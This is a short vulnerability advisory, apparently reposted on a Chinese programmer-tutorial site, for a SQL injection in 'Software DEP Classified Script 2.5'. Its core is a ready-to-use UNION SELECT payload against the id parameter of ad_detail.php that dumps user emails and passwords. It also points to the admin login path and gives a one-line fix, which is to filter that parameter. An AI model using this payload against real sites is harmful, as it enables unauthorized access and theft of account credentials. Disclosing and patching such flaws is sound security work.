-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Software DEP Classified Script 2.5 SQL Injection Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 作者: h0rd h0rd[at]null.net http://h0rd.net 下载 地址: http://www.softwaredep.com/classified-script. html 测试方式: http://www.2cto.com /ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user-- 登陆页面: http://[host]/[script]/admin/ www.2cto.com提供修复: 过滤ad_detail.php页面id参数输入
查看更多关于Software DEP Classified Script 2.5 SQL注射及修复 - 网站安的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12184